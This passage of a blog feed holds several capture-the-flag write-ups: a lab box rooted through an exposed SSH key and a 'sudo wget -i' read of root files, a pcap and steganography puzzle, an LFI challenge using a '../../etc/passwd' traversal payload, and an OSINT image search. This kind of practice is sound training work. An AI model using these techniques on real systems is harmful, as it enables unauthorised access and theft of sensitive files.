&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nmap -sVC -p- 10.48.186.30
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;result&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1
&lt;/span&gt;&lt;span class="lnt"&gt; 2
&lt;/span&gt;&lt;span class="lnt"&gt; 3
&lt;/span&gt;&lt;span class="lnt"&gt; 4
&lt;/span&gt;&lt;span class="lnt"&gt; 5
&lt;/span&gt;&lt;span class="lnt"&gt; 6
&lt;/span&gt;&lt;span class="lnt"&gt; 7
&lt;/span&gt;&lt;span class="lnt"&gt; 8
&lt;/span&gt;&lt;span class="lnt"&gt; 9
&lt;/span&gt;&lt;span class="lnt"&gt;10
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;| ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;|_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;|_http-server-header: Apache/2.4.18 (Ubuntu)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;|_http-title: Apache2 Ubuntu Default Page: It works
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;check webpage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="check port 80" class="gallery-image" data-flex-basis="438px" data-flex-grow="182" height="626" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/1.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/1_hu_3cdfdc630288c8c8.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/1.png 1144w" width="1144"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;use gobuster to enumrate directory&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;gobuster dir -u &amp;#34;http://10.48.186.30/&amp;#34; -w /usr/share/wordlists/dirb/big.txt -t 64
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img alt="result" class="gallery-image" data-flex-basis="1152px" data-flex-grow="480" height="141" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/2.png" width="677"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="sitemap" class="gallery-image" data-flex-basis="358px" data-flex-grow="149" height="753" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/3.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/3_hu_93d05ca5cff60ffe.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/3.png 1124w" width="1124"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;checked site can&amp;rsquo;t find form or any parameter in url&lt;/li&gt;
&lt;li&gt;maybe enumarate more&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;gobuster dir -u http://10.48.186.30/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img alt=".ssh looks interesting" class="gallery-image" data-flex-basis="394px" data-flex-grow="164" height="371" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/4.png" width="610"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="check .ssh" class="gallery-image" data-flex-basis="505px" data-flex-grow="210" height="361" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/5.png" width="761"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;i have private key&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;but i still don&amp;rsquo;t have username for ssh&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="user-enumaration"&gt;user enumaration
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;on about page i found few username
&lt;img alt="bunch of dev on about page" class="gallery-image" data-flex-basis="389px" data-flex-grow="162" height="678" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/6.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/6_hu_de3fd008d4b7e688.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/6.png 1099w" width="1099"&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;i tried all did not work&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;check source code&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;on webpage i found this comment&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &amp;lt;!-- Jessie don&amp;#39;t forget to udate the webiste --&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;use this credentials&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;chmod 400 id_rsa
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ssh jessie@10.48.186.30 -i id_rsa
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img alt="user.txt" class="gallery-image" data-flex-basis="795px" data-flex-grow="331" height="209" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/7.png" width="693"&gt;&lt;/p&gt;
&lt;h2 id="privilage-escalation"&gt;privilage escalation
&lt;/h2&gt;&lt;p&gt;&lt;img alt="wget can be exploited" class="gallery-image" data-flex-basis="1201px" data-flex-grow="500" height="183" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/8.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/8_hu_76473e9987cbdb73.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/8.png 916w" width="916"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;so i tried file read GTFO&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;span class="lnt"&gt;4
&lt;/span&gt;&lt;span class="lnt"&gt;5
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo wget -i /root/root.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;No URLs found in /root/root.txt.
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo wget -i /root/root_flag.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;--2026-03-09 23:53:09-- http://b1b968b37519ad1daa6408188649263d/
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Resolving b1b968b37519ad1daa6408188649263d (b1b968b37519ad1daa6408188649263d)... failed: Name or service not known.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&amp;amp; we have root flag&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;</description></item><item><title>Routine Checks ApoorvCTF writeup</title><link>https://quixtalia.in/p/routine-checks-apoorvctf-writeup/</link><pubDate>Mon, 09 Mar 2026 11:00:21 +0000</pubDate><guid>https://quixtalia.in/p/routine-checks-apoorvctf-writeup/</guid><description>&lt;p&gt;&lt;img alt="chal" class="gallery-image" data-flex-basis="228px" data-flex-grow="95" height="494" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/1.png" width="471"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;download pcap file&lt;/li&gt;
&lt;li&gt;follow tcp stream&lt;/li&gt;
&lt;li&gt;contain jpg file but it is corrupt&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="hex dump as seen in wireshark" class="gallery-image" data-flex-basis="268px" data-flex-grow="111" height="956" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2.png" srcset="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2_hu_efeceffb776cfc94.png 800w, https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2.png 1069w" width="1069"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a class="link" href="https://www.file-recovery.com/jpg-signature-format.htm" target="_blank" rel="noopener"
 &gt;https://www.file-recovery.com/jpg-signature-format.htm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="original jpeg JFIF signature aka magic no." class="gallery-image" data-flex-basis="643px" data-flex-grow="268" height="331" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3.png" srcset="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3_hu_5adb95f8d2cbeea8.png 800w, https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3.png 888w" width="888"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;using any hex editor change 3f to ff as jpeg JFIF header&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;save this dump in dump.txt&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;awk &amp;#39;{for(i=2;i&amp;lt;=17;i++) printf $i} END{print &amp;#34;&amp;#34;}&amp;#39; dump.txt | xxd -r -p &amp;gt; recovered.jpg
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;gives this qr&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="qr code " class="gallery-image" data-flex-basis="255px" data-flex-grow="106" height="229" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/4.png" width="244"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;apporvctf{this_aint_it_brother}&lt;/li&gt;
&lt;li&gt;dead end&lt;/li&gt;
&lt;li&gt;we are onto it&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;span class="lnt"&gt;4
&lt;/span&gt;&lt;span class="lnt"&gt;5
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ steghide extract -sf recovered.jpg
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Enter passphrase: 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wrote extracted data to &amp;#34;realflag.txt&amp;#34;.
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ cat realflag.txt 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;apoorvctf{b1ts_wh1sp3r_1n_th3_l0w3st_b1t}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>lespion lab</title><link>https://quixtalia.in/p/lespion-lab/</link><pubDate>Sat, 28 Feb 2026 23:46:21 +0000</pubDate><guid>https://quixtalia.in/p/lespion-lab/</guid><description>&lt;h2 id="scenario"&gt;Scenario
&lt;/h2&gt;&lt;p&gt;&lt;img alt="Scenario" class="gallery-image" data-flex-basis="1182px" data-flex-grow="492" height="231" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/lespion-lab/1.png" srcset="https://quixtalia.in/p/lespion-lab/1_hu_61d7ce731169127b.png 800w, https://quixtalia.in/p/lespion-lab/1.png 1138w" width="1138"&gt;&lt;/p&gt;
&lt;h2 id="questions"&gt;Questions
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;extract zip file given&lt;/li&gt;
&lt;li&gt;github link&lt;/li&gt;
&lt;/ul&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;a class="link" href="https://github.com/EMarseille99" target="_blank" rel="noopener"
 &gt;https://github.com/EMarseille99&lt;/a&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;this are all offsec tools&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>the crime lab</title><link>https://quixtalia.in/p/the-crime-lab/</link><pubDate>Sat, 28 Feb 2026 23:46:21 +0000</pubDate><guid>https://quixtalia.in/p/the-crime-lab/</guid><description>&lt;h2 id="scenario"&gt;Scenario
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;this is test&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="questions"&gt;Questions
&lt;/h2&gt;</description></item><item><title>lo-fi writeup</title><link>https://quixtalia.in/p/lo-fi-writeup/</link><pubDate>Sat, 28 Feb 2026 21:00:21 +0000</pubDate><guid>https://quixtalia.in/p/lo-fi-writeup/</guid><description>&lt;ul&gt;
&lt;li&gt;nmap scan&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nmap -sVC -p- $IP
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;resultS&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;span class="lnt"&gt;4
&lt;/span&gt;&lt;span class="lnt"&gt;5
&lt;/span&gt;&lt;span class="lnt"&gt;6
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;|_http-server-header: Apache/2.2.22 (Ubuntu)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;|_http-title: Lo-Fi Music
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;check web server&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;play around bit you will find page parameter is vulnerable to LFI&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;traverse enough to land in root &lt;code&gt;/&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;=../../../../../../../../../../../..//etc/passwd&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;now flag.txt&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;</description></item><item><title>OSINT 003 hackmyvm challenge</title><link>https://quixtalia.in/p/osint-003-hackmyvm-challenge/</link><pubDate>Fri, 27 Feb 2026 23:46:21 +0000</pubDate><guid>https://quixtalia.in/p/osint-003-hackmyvm-challenge/</guid><description>&lt;p&gt;Who is she?&lt;/p&gt;
&lt;p&gt;Flag format: HMV{namelastname}&lt;/p&gt;
&lt;p&gt;Ex: HMV{johnwick}&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;img alt="given" class="gallery-image" data-flex-basis="243px" data-flex-grow="101" height="486" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/1.png" width="493"&gt;&lt;/p&gt;
&lt;p&gt;use any image reverse site&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a class="link" href="https://picdetective.com" target="_blank" rel="noopener"
 &gt;https://picdetective.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://tineye.com/" target="_blank" rel="noopener"
 &gt;https://tineye.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://images.google.com/" target="_blank" rel="noopener"
 &gt;https://images.google.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://yandex.com/images/search" target="_blank" rel="noopener"
 &gt;https://yandex.com/images/search&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="reverse search image" class="gallery-image" data-flex-basis="559px" data-flex-grow="233" height="698" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/2.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/2_hu_3e2e8711b9e52dec.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/2_hu_50c73ce8a1d1383f.png 1600w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/2.png 1627w" width="1627"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="pinterest" class="gallery-image" data-flex-basis="758px" data-flex-grow="316" height="379" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/3.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/3_hu_4e7f842dbab60597.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/3.png 1198w" width="1198"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a class="link" href="https://www.insonoro.com/noticia/57213/homenaje-a-gata-cattana-con-una-exhibicion-de-grafitis-en-la-ciudad-de-granada" target="_blank" rel="noopener"
 &gt;https://www.insonoro.com/noticia/57213/homenaje-a-gata-cattana-con-una-exhibicion-de-grafitis-en-la-ciudad-de-granada&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;found spanish article&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;granada city paid tribute to passed away singer Gata Cattana&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;

 &lt;blockquote&gt;
 &lt;p&gt;HMV{GataCattana}&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;to dig bit deeper i wanted to find exact coordinate of mural&lt;/li&gt;
&lt;li&gt;i stumbled upon this site&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://peskpesk.com/gata-catana-23/" target="_blank" rel="noopener"
 &gt;https://peskpesk.com/gata-catana-23/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="article https://peskpesk.com/gata-catana-23/ " class="gallery-image" data-flex-basis="394px" data-flex-grow="164" height="627" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/4.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/4_hu_a8af826dc757834f.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/4.png 1031w" width="1031"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;upon walking bit on street view&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="street view" class="gallery-image" data-flex-basis="296px" data-flex-grow="123" height="743" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/5.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/5_hu_ed9fecf10296ebe2.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/5.png 919w" width="919"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;coordinates: 37.207969337342355, -3.620627541034744&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;i also wanted to know time when mural was painted and by whom&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="comparing old streetview footage" class="gallery-image" data-flex-basis="268px" data-flex-grow="111" height="757" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/6.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/6_hu_ab0f8004eccfe67.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/6.png 847w" width="847"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;i found yt video in same spanish article&lt;/li&gt;
&lt;/ul&gt;
